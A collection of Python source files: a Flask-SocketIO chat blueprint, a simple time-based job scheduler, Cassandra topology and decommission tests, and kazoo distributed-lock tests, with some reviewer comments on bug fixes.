            f"remaining {result.remaining}, batch_size {self.refresh_parameter.batch_size}, "
            f"duration: {result.duration:.2f} seconds"
        )
        return result
|
chat.py | # -*- coding: utf-8 -*-
"""
:author: Grey Li (李辉)
:url: http://greyli.com
:copyright: © 2018 Grey Li <withlihui@gmail.com>
:license: MIT, see LICENSE for more details.
"""
from flask import render_template, redirect, url_for, request, Blueprint, current_app, abort,flash
from flask_login import current_user, login_required
from flask_socketio import emit
import socket,binascii,threading
from catchat.extensions import socketio, db
from catchat.forms import ProfileForm
from catchat.models import Message, User
from catchat.utils import to_html, flash_errors
chat_bp = Blueprint('chat', __name__)
# NOTE(review): Blueprint has no `debug` attribute; this only sets an ad-hoc
# attribute on the object — confirm whether it can be removed.
chat_bp.debug = True

# IDs of currently connected authenticated users.
online_users = []
# Receive a message on the server and broadcast it to all clients.
@socketio.on('new message')
def new_message(message_body):
    """Persist an incoming chat message and broadcast it to all clients.

    Fix: the body was hard-coded to the debug placeholder '测试数据' (with the
    real conversion commented out) and a stray debug print was left in; the
    client-supplied text is now converted via to_html() again.
    """
    html_message = to_html(message_body)
    # Store the message in the database.
    message = Message(author=current_user._get_current_object(), body=html_message)
    db.session.add(message)
    db.session.commit()
    # Broadcast the rendered message to every connected client.
    emit('new message',
         {'message_html': render_template('chat/_message.html', message=message),
          'message_body': html_message,
          'gravatar': current_user.gravatar,
          'nickname': current_user.nickname,
          'user_id': current_user.id},
         broadcast=True)
# Push helper: emits server-generated test messages.
def test():
    # Debug helper: push 10 server-generated test messages to all clients.
    # NOTE(review): this runs on a plain Thread (see promote()), outside any
    # request/SocketIO context — `emit`, `render_template` and `current_user`
    # presumably need an application/request context here; confirm it works.
    for i in range(10):
        data = '服务端发来的测试数据'
        # NOTE(review): the Message is created but never added to db.session,
        # so these debug messages are not persisted — confirm that is intended.
        message = Message(author=current_user._get_current_object(), body=data)
        emit('new message',
             {'message_html': render_template('chat/_message.html', message=message),
              'message_body': data,
              'gravatar': current_user.gravatar,
              'nickname': current_user.nickname,
              'user_id': current_user.id
              },
             broadcast=True)
# After the promote button is clicked the server should push 10 packets of
# data to the clients; a thread is used so the request does not block.
@chat_bp.route('/promote')
def promote():
    """Kick off the debug push thread, then render the chat home page."""
    t = threading.Thread(target=test)
    # Fix: `Thread.setDaemon()` is deprecated (removed in Python 3.13);
    # assign the `daemon` attribute directly instead.
    t.daemon = True
    t.start()
    amount = current_app.config['CATCHAT_MESSAGE_PER_PAGE']
    messages = Message.query.order_by(Message.timestamp.asc())[-amount:]
    user_amount = User.query.count()
    return render_template('chat/home.html', messages=messages, user_amount=user_amount)
@socketio.on('connect')
def connect():
    """Register a newly connected authenticated user and broadcast the count."""
    global online_users
    is_new_online = (current_user.is_authenticated
                     and current_user.id not in online_users)
    if is_new_online:
        online_users.append(current_user.id)
    emit('user count', {'count': len(online_users)}, broadcast=True)
@socketio.on('disconnect')
def disconnect():
    """Drop a disconnecting user from the online list and broadcast the count."""
    global online_users
    if current_user.is_authenticated:
        if current_user.id in online_users:
            online_users.remove(current_user.id)
    emit('user count', {'count': len(online_users)}, broadcast=True)
@chat_bp.route('/')
def home():
    """Render the chat home page with the most recent messages."""
    per_page = current_app.config['CATCHAT_MESSAGE_PER_PAGE']
    # Tail of the ascending-ordered history == the newest `per_page` messages.
    recent = Message.query.order_by(Message.timestamp.asc())[-per_page:]
    return render_template('chat/home.html',
                           messages=recent,
                           user_amount=User.query.count())
@chat_bp.route('/messages')
def get_messages():
    """Return one page of message history, oldest-first within the page."""
    page = request.args.get('page', 1, type=int)
    per_page = current_app.config['CATCHAT_MESSAGE_PER_PAGE']
    pagination = Message.query.order_by(Message.timestamp.desc()).paginate(
        page, per_page=per_page)
    # Query is newest-first; reverse so the fragment renders oldest-first.
    oldest_first = list(reversed(pagination.items))
    return render_template('chat/_messages.html', messages=oldest_first)
@chat_bp.route('/profile', methods=['GET', 'POST'])
@login_required
def profile():
    """Show and process the current user's profile form."""
    form = ProfileForm()
    # Guard clause: anything but a valid POST re-renders the form.
    if not form.validate_on_submit():
        flash_errors(form)
        return render_template('chat/profile.html', form=form)
    current_user.nickname = form.nickname.data
    current_user.github = form.github.data
    current_user.website = form.website.data
    current_user.bio = form.bio.data
    db.session.commit()
    return redirect(url_for('.home'))
@chat_bp.route('/profile/<user_id>')
def get_profile(user_id):
    """Render the profile card for the given user; 404 if unknown."""
    return render_template('chat/_profile_card.html',
                           user=User.query.get_or_404(user_id))
@chat_bp.route('/message/delete/<message_id>', methods=['DELETE'])
def delete_message(message_id):
    """Delete a message; only its author or an admin may do so."""
    message = Message.query.get_or_404(message_id)
    allowed = current_user == message.author or current_user.is_admin
    if not allowed:
        abort(403)
    db.session.delete(message)
    db.session.commit()
    return '', 204
|
scheduler.py |
import time
from datetime import datetime
from threading import Thread
class Scheduler:
    """Minute-resolution job scheduler polling on a background thread.

    Jobs are registered under an ID with an (hour, minute) pair and are
    fired at most once per matching wall-clock minute (shifted by
    ``timezone``).
    """

    def __init__(self, timezone: int = 0, granularity: int = 30):
        """
        :param timezone: hour offset applied to the local clock (wraps mod 24).
        :param granularity: seconds between polls; keep it below 60 so no
            minute is skipped.
        """
        # Maps job ID -> ((hour, minute), callable).
        self.scheduled = {}
        self.running = True
        self.thread = None
        self.timezone = timezone
        self.granularity = granularity

    def add(self, ID, time, job):
        """Register (or replace) job ``ID`` to run at ``time`` = (hour, minute).

        ``job`` is called with the job ID as its only argument.
        (The parameter name ``time`` shadows the module; kept for
        keyword-call compatibility.)
        """
        self.scheduled[ID] = (time, job)

    def remove(self, ID):
        """Unregister job ``ID``; a missing ID is silently ignored."""
        if ID in self.scheduled:
            self.scheduled.pop(ID)

    def stop(self):
        """Stop the polling loop and wait for the thread to exit."""
        self.running = False
        if self.thread is not None:
            self.thread.join()
            self.thread = None

    def run(self):
        """Start the background polling thread."""
        self.running = True
        self.thread = Thread(target=self._run)
        self.thread.start()

    def get_time(self):
        """Return the current timezone-shifted time formatted as ``H:MM``."""
        now = self.now()
        return '{}:{}'.format(now[0], str(now[1]).rjust(2, '0'))

    def now(self):
        """Return the current (hour, minute), hour shifted by ``timezone``."""
        t = datetime.now().time()
        return ((t.hour + self.timezone) % 24, t.minute)

    def _run(self):
        """Polling loop: fire due jobs once per wall-clock minute.

        Bug fix: the original guard compared the previously-seen *minute*
        against both the current hour and the current minute
        (``lm != now[0] and lm != now[1]``), which skipped dispatches at
        hour changes and whenever the current hour happened to equal the
        previous minute. Compare the full (hour, minute) tuple instead.
        """
        last = (-1, -1)
        while self.running:
            now = self.now()
            # Dispatch only when the clock minute has changed since the last
            # dispatch, so each job fires at most once per matching minute.
            if last != now:
                # Snapshot the items so add()/remove() from other threads
                # cannot invalidate the iteration mid-loop.
                for ID, (t, job) in list(self.scheduled.items()):
                    h, m = t
                    if now[0] == h and now[1] == m:
                        job(ID)
                last = now
            # sleep for x seconds
            time.sleep(self.granularity)
|
topology_test.py | import re
import time
import pytest
import logging
from threading import Thread
from cassandra import ConsistencyLevel
from ccmlib.node import TimeoutError, ToolError
from dtest import Tester, create_ks, create_cf
from tools.assertions import assert_almost_equal, assert_all, assert_none
from tools.data import insert_c1c2, query_c1c2
since = pytest.mark.since
logger = logging.getLogger(__name__)
class TestTopology(Tester):
    """Ring-topology dtests: join, token move, and decommission behavior.

    These tests drive real ccm-managed Cassandra clusters; they rely on
    nodetool output, log watching, and wall-clock sleeps.
    """

    def test_do_not_join_ring(self):
        """
        @jira_ticket CASSANDRA-9034
        Check that AssertionError is not thrown on SizeEstimatesRecorder before node joins ring
        """
        cluster = self.cluster.populate(1)
        node1, = cluster.nodelist()

        node1.start(wait_for_binary_proto=True, join_ring=False,
                    jvm_args=["-Dcassandra.size_recorder_interval=1"])

        # initial delay is 30s
        time.sleep(40)

        node1.stop(gently=False)

    @since('3.0.11')
    def test_size_estimates_multidc(self):
        """
        Test that primary ranges are correctly generated on
        system.size_estimates for multi-dc, multi-ks scenario
        @jira_ticket CASSANDRA-9639
        """
        logger.debug("Creating cluster")
        cluster = self.cluster
        cluster.set_configuration_options(values={'num_tokens': 2})
        cluster.populate([2, 1])
        node1_1, node1_2, node2_1 = cluster.nodelist()

        logger.debug("Setting tokens")
        # Two tokens per node, chosen so the primary-range assertions below
        # are deterministic.
        node1_tokens, node2_tokens, node3_tokens = ['-6639341390736545756,-2688160409776496397',
                                                    '-2506475074448728501,8473270337963525440',
                                                    '-3736333188524231709,8673615181726552074']
        node1_1.set_configuration_options(values={'initial_token': node1_tokens})
        node1_2.set_configuration_options(values={'initial_token': node2_tokens})
        node2_1.set_configuration_options(values={'initial_token': node3_tokens})
        cluster.set_configuration_options(values={'num_tokens': 2})

        logger.debug("Starting cluster")
        cluster.start()

        out, _, _ = node1_1.nodetool('ring')
        logger.debug("Nodetool ring output {}".format(out))

        logger.debug("Creating keyspaces")
        session = self.patient_cql_connection(node1_1)
        create_ks(session, 'ks1', 3)
        create_ks(session, 'ks2', {'dc1': 2})
        create_cf(session, 'ks1.cf1', columns={'c1': 'text', 'c2': 'text'})
        create_cf(session, 'ks2.cf2', columns={'c1': 'text', 'c2': 'text'})

        logger.debug("Refreshing size estimates")
        node1_1.nodetool('refreshsizeestimates')
        node1_2.nodetool('refreshsizeestimates')
        node2_1.nodetool('refreshsizeestimates')

        # Reference layout for the assertions below (no-op string literal).
        """
        CREATE KEYSPACE ks1 WITH replication =
            {'class': 'SimpleStrategy', 'replication_factor': '3'}
        CREATE KEYSPACE ks2 WITH replication =
            {'class': 'NetworkTopologyStrategy', 'dc1': '2'} AND durable_writes = true;

        Datacenter: dc1
        ==========
        Address     Token
                    8473270337963525440
        127.0.0.1   -6639341390736545756
        127.0.0.1   -2688160409776496397
        127.0.0.2   -2506475074448728501
        127.0.0.2   8473270337963525440

        Datacenter: dc2
        ==========
        Address     Token
                    8673615181726552074
        127.0.0.3   -3736333188524231709
        127.0.0.3   8673615181726552074
        """

        logger.debug("Checking node1_1 size_estimates primary ranges")
        session = self.patient_exclusive_cql_connection(node1_1)
        assert_all(session, "SELECT range_start, range_end FROM system.size_estimates "
                            "WHERE keyspace_name = 'ks1'", [['-3736333188524231709', '-2688160409776496397'],
                                                            ['-9223372036854775808', '-6639341390736545756'],
                                                            ['8673615181726552074', '-9223372036854775808']])
        assert_all(session, "SELECT range_start, range_end FROM system.size_estimates "
                            "WHERE keyspace_name = 'ks2'", [['-3736333188524231709', '-2688160409776496397'],
                                                            ['-6639341390736545756', '-3736333188524231709'],
                                                            ['-9223372036854775808', '-6639341390736545756'],
                                                            ['8473270337963525440', '8673615181726552074'],
                                                            ['8673615181726552074', '-9223372036854775808']])

        logger.debug("Checking node1_2 size_estimates primary ranges")
        session = self.patient_exclusive_cql_connection(node1_2)
        assert_all(session, "SELECT range_start, range_end FROM system.size_estimates "
                            "WHERE keyspace_name = 'ks1'", [['-2506475074448728501', '8473270337963525440'],
                                                            ['-2688160409776496397', '-2506475074448728501']])
        assert_all(session, "SELECT range_start, range_end FROM system.size_estimates "
                            "WHERE keyspace_name = 'ks2'", [['-2506475074448728501', '8473270337963525440'],
                                                            ['-2688160409776496397', '-2506475074448728501']])

        logger.debug("Checking node2_1 size_estimates primary ranges")
        session = self.patient_exclusive_cql_connection(node2_1)
        assert_all(session, "SELECT range_start, range_end FROM system.size_estimates "
                            "WHERE keyspace_name = 'ks1'", [['-6639341390736545756', '-3736333188524231709'],
                                                            ['8473270337963525440', '8673615181726552074']])
        assert_none(session, "SELECT range_start, range_end FROM system.size_estimates "
                             "WHERE keyspace_name = 'ks2'")

    def test_simple_decommission(self):
        """
        @jira_ticket CASSANDRA-9912
        Check that AssertionError is not thrown on SizeEstimatesRecorder after node is decommissioned
        """
        cluster = self.cluster
        cluster.populate(3)
        cluster.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.size_recorder_interval=1"])
        node1, node2, node3 = cluster.nodelist()

        session = self.patient_cql_connection(node1)
        if cluster.version() >= '2.2':
            # reduce system_distributed RF to 2 so we don't require forceful decommission
            session.execute("ALTER KEYSPACE system_distributed WITH REPLICATION = {'class':'SimpleStrategy', 'replication_factor':'2'};")

        # write some data
        node1.stress(['write', 'n=10K', 'no-warmup', '-rate', 'threads=8'])

        # Decommission node and wipe its data
        node2.decommission()
        node2.stop()

        # This sleep is here to give the cluster time to hit the AssertionError
        # described in 9912. Do not remove it.
        time.sleep(10)

    @pytest.mark.skip(reason='Hangs on CI for 2.1')
    def test_concurrent_decommission_not_allowed(self):
        """
        Test concurrent decommission is not allowed
        """
        cluster = self.cluster
        cluster.set_configuration_options(values={'stream_throughput_outbound_megabits_per_sec': 1})
        cluster.populate(2).start(wait_other_notice=True)
        node1, node2 = cluster.nodelist()

        session = self.patient_cql_connection(node2)
        create_ks(session, 'ks', 1)
        create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'})
        insert_c1c2(session, n=10000, consistency=ConsistencyLevel.ALL)

        mark = node2.mark_log()

        def decommission():
            node2.nodetool('decommission')

        # Launch first decommission in a external thread
        t = Thread(target=decommission)
        t.start()

        # Make sure first decommission is initialized before second decommission
        node2.watch_log_for('DECOMMISSIONING', filename='debug.log')

        # Launch a second decommission, should fail
        with pytest.raises(ToolError):
            node2.nodetool('decommission')

        # Check data is correctly forwarded to node1 after node2 is decommissioned
        t.join()
        node2.watch_log_for('DECOMMISSIONED', from_mark=mark)
        session = self.patient_cql_connection(node1)
        session.execute('USE ks')
        for n in range(0, 10000):
            query_c1c2(session, n, ConsistencyLevel.ONE)

    @since('3.10')
    def test_resumable_decommission(self):
        """
        @jira_ticket CASSANDRA-12008
        Test decommission operation is resumable
        """
        self.fixture_dtest_setup.ignore_log_patterns = [r'Streaming error occurred',
                                                        r'Error while decommissioning node',
                                                        r'Remote peer 127.0.0.2 failed stream session',
                                                        r'Remote peer 127.0.0.2:7000 failed stream session']
        cluster = self.cluster
        # Throttle streaming so byteman has time to inject the failure.
        cluster.set_configuration_options(values={'stream_throughput_outbound_megabits_per_sec': 1})
        cluster.populate(3, install_byteman=True).start(wait_other_notice=True)
        node1, node2, node3 = cluster.nodelist()

        session = self.patient_cql_connection(node2)
        # reduce system_distributed RF to 2 so we don't require forceful decommission
        session.execute("ALTER KEYSPACE system_distributed WITH REPLICATION = {'class':'SimpleStrategy', 'replication_factor':'2'};")
        create_ks(session, 'ks', 2)
        create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'})
        insert_c1c2(session, n=10000, consistency=ConsistencyLevel.ALL)

        # Execute first rebuild, should fail
        with pytest.raises(ToolError):
            if cluster.version() >= '4.0':
                script = ['./byteman/4.0/decommission_failure_inject.btm']
            else:
                script = ['./byteman/pre4.0/decommission_failure_inject.btm']
            node2.byteman_submit(script)
            node2.nodetool('decommission')

        # Make sure previous ToolError is due to decommission
        node2.watch_log_for('Error while decommissioning node')

        # Decommission again
        mark = node2.mark_log()
        node2.nodetool('decommission')

        # Check decommision is done and we skipped transfereed ranges
        node2.watch_log_for('DECOMMISSIONED', from_mark=mark)
        node2.grep_log("Skipping transferred range .* of keyspace ks, endpoint {}".format(node2.address_for_current_version_slashy()), filename='debug.log')

        # Check data is correctly forwarded to node1 and node3
        cluster.remove(node2)
        node3.stop(gently=False)
        session = self.patient_exclusive_cql_connection(node1)
        session.execute('USE ks')
        for i in range(0, 10000):
            query_c1c2(session, i, ConsistencyLevel.ONE)
        node1.stop(gently=False)
        node3.start()
        session.shutdown()
        mark = node3.mark_log()
        node3.watch_log_for('Starting listening for CQL clients', from_mark=mark)
        session = self.patient_exclusive_cql_connection(node3)
        session.execute('USE ks')
        for i in range(0, 10000):
            query_c1c2(session, i, ConsistencyLevel.ONE)

    @pytest.mark.no_vnodes
    def test_movement(self):
        """Move tokens to rebalance an intentionally unbalanced 3-node ring."""
        cluster = self.cluster

        # Create an unbalanced ring
        cluster.populate(3, tokens=[0, 2**48, 2**62]).start()
        node1, node2, node3 = cluster.nodelist()

        session = self.patient_cql_connection(node1)
        create_ks(session, 'ks', 1)
        create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'})
        insert_c1c2(session, n=30000, consistency=ConsistencyLevel.ONE)

        cluster.flush()

        # Move nodes to balance the cluster
        def move_node(node, token):
            mark = node.mark_log()
            node.move(token)  # can't assume 0 is balanced with m3p
            node.watch_log_for('{} state jump to NORMAL'.format(node.address_for_current_version()), from_mark=mark, timeout=180)
            time.sleep(3)

        balancing_tokens = cluster.balanced_tokens(3)
        move_node(node1, balancing_tokens[0])
        move_node(node2, balancing_tokens[1])
        move_node(node3, balancing_tokens[2])

        time.sleep(1)
        cluster.cleanup()

        # Check we can get all the keys
        for n in range(0, 30000):
            query_c1c2(session, n, ConsistencyLevel.ONE)

        # Now the load should be basically even
        sizes = [node.data_size() for node in [node1, node2, node3]]
        assert_almost_equal(sizes[0], sizes[1])
        assert_almost_equal(sizes[0], sizes[2])
        assert_almost_equal(sizes[1], sizes[2])

    @pytest.mark.no_vnodes
    def test_decommission(self):
        """Decommission one node of four; verify keys and data-size ratios."""
        cluster = self.cluster

        tokens = cluster.balanced_tokens(4)
        cluster.populate(4, tokens=tokens).start()
        node1, node2, node3, node4 = cluster.nodelist()

        session = self.patient_cql_connection(node1)
        create_ks(session, 'ks', 2)
        create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'})
        insert_c1c2(session, n=30000, consistency=ConsistencyLevel.QUORUM)

        cluster.flush()
        sizes = [node.data_size() for node in cluster.nodelist() if node.is_running()]
        init_size = sizes[0]
        assert_almost_equal(*sizes)

        time.sleep(.5)
        node4.decommission()
        node4.stop()
        cluster.cleanup()
        time.sleep(.5)

        # Check we can get all the keys
        for n in range(0, 30000):
            query_c1c2(session, n, ConsistencyLevel.QUORUM)

        sizes = [node.data_size() for node in cluster.nodelist() if node.is_running()]
        logger.debug(sizes)
        assert_almost_equal(sizes[0], sizes[1])
        assert_almost_equal((2.0 / 3.0) * sizes[0], sizes[2])
        assert_almost_equal(sizes[2], init_size)

    @pytest.mark.no_vnodes
    def test_move_single_node(self):
        """ Test moving a node in a single-node cluster (#4200) """
        cluster = self.cluster

        # Create an unbalanced ring
        cluster.populate(1, tokens=[0]).start()
        node1 = cluster.nodelist()[0]
        time.sleep(0.2)

        session = self.patient_cql_connection(node1)
        create_ks(session, 'ks', 1)
        create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'})
        insert_c1c2(session, n=10000, consistency=ConsistencyLevel.ONE)

        cluster.flush()

        node1.move(2**25)
        time.sleep(1)

        cluster.cleanup()

        # Check we can get all the keys
        for n in range(0, 10000):
            query_c1c2(session, n, ConsistencyLevel.ONE)

    @since('3.0')
    def test_decommissioned_node_cant_rejoin(self):
        """
        @jira_ticket CASSANDRA-8801

        Test that a decommissioned node can't rejoin the cluster by:

        - creating a cluster,
        - decommissioning a node, and
        - asserting that the "decommissioned node won't rejoin" error is in the
          logs for that node and
        - asserting that the node is not running.
        """
        rejoin_err = 'This node was decommissioned and will not rejoin the ring'
        self.fixture_dtest_setup.ignore_log_patterns = list(self.fixture_dtest_setup.ignore_log_patterns) + [
            rejoin_err]

        self.cluster.populate(3).start(wait_for_binary_proto=True)
        node1, node2, node3 = self.cluster.nodelist()

        logger.debug('decommissioning...')
        node3.decommission(force=self.cluster.version() >= '4.0')
        logger.debug('stopping...')
        node3.stop()
        logger.debug('attempting restart...')
        node3.start(wait_other_notice=False)
        try:
            # usually takes 3 seconds, so give it a generous 15
            node3.watch_log_for(rejoin_err, timeout=15)
        except TimeoutError:
            # TimeoutError is not very helpful to the reader of the test output;
            # let that pass and move on to string assertion below
            pass

        assert re.search(rejoin_err,
                         '\n'.join(['\n'.join(err_list) for err_list in node3.grep_log_for_errors()]), re.MULTILINE)

        # Give the node some time to shut down once it has detected
        # its invalid state. If it doesn't shut down in the 30 seconds,
        # consider filing a bug. It shouldn't take more than 10, in most cases.
        start = time.time()
        while start + 30 > time.time() and node3.is_running():
            time.sleep(1)

        assert not node3.is_running()

    @since('3.0')
    def test_crash_during_decommission(self):
        """
        If a node crashes whilst another node is being decommissioned,
        upon restarting the crashed node should not have invalid entries
        for the decommissioned node
        @jira_ticket CASSANDRA-10231
        """
        cluster = self.cluster
        self.fixture_dtest_setup.ignore_log_patterns = [r'Streaming error occurred', 'Stream failed']
        cluster.populate(3).start(wait_other_notice=True)
        node1, node2 = cluster.nodelist()[0:2]

        t = DecommissionInParallel(node1)
        t.start()

        node1.watch_log_for("DECOMMISSIONING", filename='debug.log')
        # NOTE(review): non-raw regex string; `\s` / `\.` currently pass
        # through unchanged, but a raw string (r"...") would be safer.
        null_status_pattern = re.compile(".N(?:\s*)127\.0\.0\.1(?:.*)null(?:\s*)rack1")
        while t.is_alive():
            out = self.show_status(node2)
            if null_status_pattern.search(out):
                logger.debug("Matched null status entry")
                break
            logger.debug("Restarting node2")
            node2.stop(gently=False)
            node2.start(wait_for_binary_proto=True, wait_other_notice=False)

        logger.debug("Waiting for decommission to complete")
        t.join()
        self.show_status(node2)

        logger.debug("Sleeping for 30 seconds to allow gossip updates")
        time.sleep(30)
        out = self.show_status(node2)
        assert not null_status_pattern.search(out)

    @since('3.12')
    @pytest.mark.resource_intensive
    def test_stop_decommission_too_few_replicas_multi_dc(self):
        """
        Decommission should fail when it would result in the number of live replicas being less than
        the replication factor. --force should bypass this requirement.

        @jira_ticket CASSANDRA-12510
        @expected_errors ToolError when # nodes will drop below configured replicas in NTS/SimpleStrategy
        """
        cluster = self.cluster
        cluster.populate([2, 2]).start(wait_for_binary_proto=True)
        node1, node2, node3, node4 = self.cluster.nodelist()
        session = self.patient_cql_connection(node2)
        session.execute("ALTER KEYSPACE system_distributed WITH REPLICATION = {'class':'SimpleStrategy', 'replication_factor':'2'};")
        create_ks(session, 'ks', {'dc1': 2, 'dc2': 2})
        with pytest.raises(ToolError):
            node4.nodetool('decommission')

        session.execute('DROP KEYSPACE ks')
        create_ks(session, 'ks2', 4)
        with pytest.raises(ToolError):
            node4.nodetool('decommission')

        node4.nodetool('decommission --force')
        decommissioned = node4.watch_log_for("DECOMMISSIONED", timeout=120)
        assert decommissioned, "Node failed to decommission when passed --force"

    def show_status(self, node):
        """Run `nodetool status` on *node*, log the output, and return it."""
        out, _, _ = node.nodetool('status')
        logger.debug("Status as reported by node {}".format(node.address()))
        logger.debug(out)
        return out
class DecommissionInParallel(Thread):
    """Background thread that runs `nodetool decommission` on one node."""

    def __init__(self, node):
        Thread.__init__(self)
        self.node = node

    def run(self):
        target = self.node
        log_mark = target.mark_log()
        try:
            stdout, stderr, _ = target.nodetool("decommission")
            target.watch_log_for("DECOMMISSIONED", from_mark=log_mark)
            logger.debug(stdout)
            logger.debug(stderr)
        except ToolError as exc:
            # Best-effort: decommission failures are logged, not re-raised.
            logger.debug("Decommission failed with exception: " + str(exc))
|
test_lock.py | """license: Apache License 2.0, see LICENSE for more details."""
import uuid
import threading
from nose.tools import eq_, ok_
from kazoo.exceptions import CancelledError
from kazoo.exceptions import LockTimeout
from kazoo.testing import KazooTestCase
from kazoo.tests.util import wait
class KazooLockTests(KazooTestCase):
    """Threaded tests for the kazoo Lock recipe.

    ``active_thread`` / ``cancelled_threads`` are shared test state guarded
    by ``self.condition``; worker threads run
    ``_thread_lock_acquire_til_event``.
    """

    def setUp(self):
        super(KazooLockTests, self).setUp()
        # Unique lock path per test so runs cannot interfere.
        self.lockpath = "/" + uuid.uuid4().hex

        self.condition = threading.Condition()
        self.released = threading.Event()
        self.active_thread = None
        self.cancelled_threads = []

    def _thread_lock_acquire_til_event(self, name, lock, event):
        """Acquire *lock*, mark *name* active until *event* fires.

        A CancelledError is recorded in ``self.cancelled_threads``.
        """
        try:
            with lock:
                with self.condition:
                    eq_(self.active_thread, None)
                    self.active_thread = name
                    self.condition.notify_all()

                event.wait()

                with self.condition:
                    eq_(self.active_thread, name)
                    self.active_thread = None
                    self.condition.notify_all()
            self.released.set()
        except CancelledError:
            with self.condition:
                self.cancelled_threads.append(name)
                self.condition.notify_all()

    def test_lock_one(self):
        lock_name = uuid.uuid4().hex
        lock = self.client.Lock(self.lockpath, lock_name)
        event = threading.Event()

        thread = threading.Thread(target=self._thread_lock_acquire_til_event,
                                  args=(lock_name, lock, event))
        thread.start()

        lock2_name = uuid.uuid4().hex
        anotherlock = self.client.Lock(self.lockpath, lock2_name)

        # wait for any contender to show up on the lock
        wait(anotherlock.contenders)
        eq_(anotherlock.contenders(), [lock_name])

        with self.condition:
            while self.active_thread != lock_name:
                self.condition.wait()

        # release the lock
        event.set()

        with self.condition:
            while self.active_thread:
                self.condition.wait()
        self.released.wait()
        thread.join()

    def test_lock(self):
        threads = []
        names = ["contender" + str(i) for i in range(5)]
        contender_bits = {}

        for name in names:
            e = threading.Event()
            l = self.client.Lock(self.lockpath, name)
            t = threading.Thread(target=self._thread_lock_acquire_til_event,
                                 args=(name, l, e))
            contender_bits[name] = (t, e)
            threads.append(t)

        # acquire the lock ourselves first to make the others line up
        lock = self.client.Lock(self.lockpath, "test")
        lock.acquire()

        for t in threads:
            t.start()

        # wait for everyone to line up on the lock
        wait(lambda: len(lock.contenders()) == 6)
        contenders = lock.contenders()

        eq_(contenders[0], "test")
        contenders = contenders[1:]
        remaining = list(contenders)

        # release the lock and contenders should claim it in order
        lock.release()

        for contender in contenders:
            thread, event = contender_bits[contender]

            with self.condition:
                while not self.active_thread:
                    self.condition.wait()
                eq_(self.active_thread, contender)

            eq_(lock.contenders(), remaining)
            remaining = remaining[1:]

            event.set()

            with self.condition:
                while self.active_thread:
                    self.condition.wait()
        for thread in threads:
            thread.join()

    def test_lock_reconnect(self):
        event = threading.Event()
        other_lock = self.client.Lock(self.lockpath, 'contender')
        thread = threading.Thread(target=self._thread_lock_acquire_til_event,
                                  args=('contender', other_lock, event))

        # acquire the lock ourselves first to make the contender line up
        lock = self.client.Lock(self.lockpath, "test")
        lock.acquire()

        thread.start()
        # wait for the contender to line up on the lock
        wait(lambda: len(lock.contenders()) == 2)
        eq_(lock.contenders(), ['test', 'contender'])

        # Contender should survive a session expiry and still take the lock.
        self.expire_session()

        lock.release()

        with self.condition:
            while not self.active_thread:
                self.condition.wait()
            eq_(self.active_thread, 'contender')

        event.set()
        thread.join()

    def test_lock_non_blocking(self):
        lock_name = uuid.uuid4().hex
        lock = self.client.Lock(self.lockpath, lock_name)
        event = threading.Event()

        thread = threading.Thread(target=self._thread_lock_acquire_til_event,
                                  args=(lock_name, lock, event))
        thread.start()

        lock1 = self.client.Lock(self.lockpath, lock_name)

        # wait for the thread to acquire the lock
        with self.condition:
            if not self.active_thread:
                self.condition.wait(5)

        ok_(not lock1.acquire(blocking=False))
        eq_(lock.contenders(), [lock_name])  # just one - itself

        event.set()
        thread.join()

    def test_lock_fail_first_call(self):
        event1 = threading.Event()
        lock1 = self.client.Lock(self.lockpath, "one")
        thread1 = threading.Thread(target=self._thread_lock_acquire_til_event,
                                   args=("one", lock1, event1))
        thread1.start()

        # wait for this thread to acquire the lock
        with self.condition:
            if not self.active_thread:
                self.condition.wait(5)
                eq_(self.active_thread, "one")
        eq_(lock1.contenders(), ["one"])
        event1.set()
        thread1.join()

    def test_lock_cancel(self):
        event1 = threading.Event()
        lock1 = self.client.Lock(self.lockpath, "one")
        thread1 = threading.Thread(target=self._thread_lock_acquire_til_event,
                                   args=("one", lock1, event1))
        thread1.start()

        # wait for this thread to acquire the lock
        with self.condition:
            if not self.active_thread:
                self.condition.wait(5)
                eq_(self.active_thread, "one")

        client2 = self._get_client()
        client2.start()
        event2 = threading.Event()
        lock2 = client2.Lock(self.lockpath, "two")
        thread2 = threading.Thread(target=self._thread_lock_acquire_til_event,
                                   args=("two", lock2, event2))
        thread2.start()

        # this one should block in acquire. check that it is a contender
        wait(lambda: len(lock2.contenders()) > 1)
        eq_(lock2.contenders(), ["one", "two"])

        lock2.cancel()
        with self.condition:
            if not "two" in self.cancelled_threads:
                self.condition.wait()
                assert "two" in self.cancelled_threads

        eq_(lock2.contenders(), ["one"])

        thread2.join()
        event1.set()
        thread1.join()
        client2.stop()

    def test_lock_double_calls(self):
        # Re-entrant acquire on the same Lock object must be a no-op.
        lock1 = self.client.Lock(self.lockpath, "one")
        lock1.acquire()
        lock1.acquire()
        lock1.release()
        lock1.release()

    def test_lock_reacquire(self):
        lock = self.client.Lock(self.lockpath, "one")
        lock.acquire()
        lock.release()
        lock.acquire()
        lock.release()

    def test_lock_timeout(self):
        timeout = 3
        e = threading.Event()
        started = threading.Event()

        # In the background thread, acquire the lock and wait thrice the time
        # that the main thread is going to wait to acquire the lock.
        lock1 = self.client.Lock(self.lockpath, "one")

        def _thread(lock, event, timeout):
            with lock:
                started.set()
                # NOTE(review): Event.isSet() is a deprecated alias of is_set().
                event.wait(timeout)
                if not event.isSet():
                    # Eventually fail to avoid hanging the tests
                    self.fail("lock2 never timed out")

        t = threading.Thread(target=_thread, args=(lock1, e, timeout * 3))
        t.start()

        # Start the main thread's kazoo client and try to acquire the lock
        # but give up after `timeout` seconds
        client2 = self._get_client()
        client2.start()
        started.wait(5)
        self.assertTrue(started.isSet())
        lock2 = client2.Lock(self.lockpath, "two")
        try:
            lock2.acquire(timeout=timeout)
        except LockTimeout:
            # A timeout is the behavior we're expecting, since the background
            # thread should still be holding onto the lock
            pass
        else:
            self.fail("Main thread unexpectedly acquired the lock")
        finally:
            # Cleanup
            e.set()
            t.join()
            client2.stop()
class TestSemaphore(KazooTestCase):
    """Threaded tests for the kazoo Semaphore recipe."""

    def setUp(self):
        super(TestSemaphore, self).setUp()
        # Unique path per test so runs cannot interfere.
        self.lockpath = "/" + uuid.uuid4().hex

        self.condition = threading.Condition()
        self.released = threading.Event()
        self.active_thread = None
        self.cancelled_threads = []

